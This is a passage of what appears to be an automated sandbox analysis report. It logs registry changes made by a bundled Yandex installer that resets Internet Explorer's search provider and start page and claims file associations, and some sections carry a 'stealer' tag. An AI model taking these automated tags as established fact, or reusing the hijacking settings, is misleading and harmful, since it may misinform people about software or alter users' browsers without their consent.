Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SR" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\ShowSearchSuggestionsInAddressGlobal = "1" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\FaviconURLFallback = "https://www.ya.ru/favicon.ico" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\NTLogoURL = "http://downloader.yandex.net/banner/ntpagelogo/{language}/{scalelevel}.png" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL_JSON = "https://suggest.yandex.ru/suggest-ff.cgi?uil=ru&part={searchTerms}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3F50EEE1-31AB-11EF-9891-EEF45767FDFF} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "425341573" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\URL = "https://yandex.ru/search/?win=651&clid=6035498-354&text={searchTerms}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\DisplayName = "Яндекс" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\SuggestionsURL_JSON = "https://suggest.yandex.ru/suggest-ff.cgi?uil=ru&part={searchTerms}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000eea70a7786efe43a7a30281857b4a13000000000200000000001066000000010000200000006de755597d9916f64694af876b897cf0bff1e5adc5138a439db8830247c06d28000000000e8000000002000020000000f8fae9e9d2d855cf52723466d6dea47607efa30fb6073c6c8ebf78ff3dab17939000000045b99933857c9fb1d24947e849cf019287e757d563b0cca61058b94741171bf90ee22afa16ed1df1c69e4d77e8827ecd8f095ec7ccb32f74c466e29f4a977211cf654ccebd9e156039fac427b9a16929fad3417235af91355a9f9ac4df864e9da8e12d5a08bac402d84e2af7a146f5035f48d697a8ecc24d59a7aa06883328a883eb3ce52a7b133491bafaae8f5ed4da40000000a3b2bf5bb5b6036938d3b85bad408e3ffa21190eb5042137d21fd20ae71962547ffdb915cd9b433ace395ddb6e1f9dfab2529366a887b5674fa3e95ee5906583 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\Local\\MICROS~1\\INTERN~1\\Services\\YANDEX~1.ICO" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTURL = "https://yandex.ru/search/?win=651&clid=6035502-354&text={searchTerms}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\NTURL = "https://yandex.ru/search/?win=651&clid=6035502-354&text={searchTerms}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "https://www.ya.ru/favicon.ico" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\buffer\TopResultURLFallback = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IE11TR" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff\FaviconURLFallback = "http://www.bing.com/favicon.ico" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoURL = "http://downloader.yandex.net/banner/ntpagelogo/{language}/{scalelevel}.png" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000eea70a7786efe43a7a30281857b4a130000000002000000000010660000000100002000000028fa4a42dcd4abcd6db431b037682cc2844e7c091e531450b3b95de1ae9fcd54000000000e8000000002000020000000259ee738312bb1601c2c5357c7be9a832277f41655c0ef4831d59db3f2fef79b200000004197207ac0288b8d337395781db3467b053b0548bf25142d4c722ae82496b5df400000001ed05618015792d2e076b3b9ad6844d648ef67e77dbbeb68b23836b8567801f70b11f35bcac57af6e9f2471616e05fad62e3c07c79b1eabc102f231605e5d50f C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\60c5c870-31ab-11ef-a91f-eef45767fdff C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\buffer\DisplayName = "Bing" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\YaCreationDate = "2024-56-23" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A

Modifies Internet Explorer start page

stealer
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "https://www.ya.ru/?win=651&clid=6035495-354" C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\AppDataLow\Yandex C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\AppDataLow C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\AppDataLow\Yandex C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\AppDataLow\Yandex\UICreated_SYSTEM = "1" C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexFB2.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexWEBP.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,-123" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.shtml\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\SystemFileAssociations\.tiff\shell\image_search C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexHTML.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexSVG.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.crx\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.css\OpenWithProgids\YandexCSS.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexJPEG.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexWEBP.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexXML.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexXML.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.xml\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexCSS.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,-124" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexPNG.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\SystemFileAssociations\.tif\shell\image_search\ = "Поиск по картинке" C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexCRX.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexFB2.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexINFE.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\SystemFileAssociations\.png\shell C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexGIF.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.infected\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.htm C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.webp\OpenWithProgids\YandexWEBP.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexFB2.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexWEBP.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexXML.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\yabrowser C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\SystemFileAssociations\.webp\shell\image_search\ = "Поиск по картинке" C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexTXT.ZPRIUFGQ5KQOETUJVA6LWFNAFA\ = "Yandex Browser TXT Document" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\SystemFileAssociations\.bmp C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexBrowser.crx\shell\open C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexBrowser.crx\shell\open\command C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexBrowser.crx\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexHTML.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexPNG.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\SystemFileAssociations\.webp\shell\image_search\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --image-search=\"%1\"" C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexCSS.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexSVG.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexTXT.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexWEBP.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.css C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexJS.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexTXT.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\SystemFileAssociations\.webp\shell\image_search\Icon = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,0" C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexEPUB.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexFB2.ZPRIUFGQ5KQOETUJVA6LWFNAFA\ = "Yandex Browser FB2 Document" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexPNG.ZPRIUFGQ5KQOETUJVA6LWFNAFA\ = "Yandex Browser PNG Document" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\yabrowser\shell\open\ddeexec\ C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
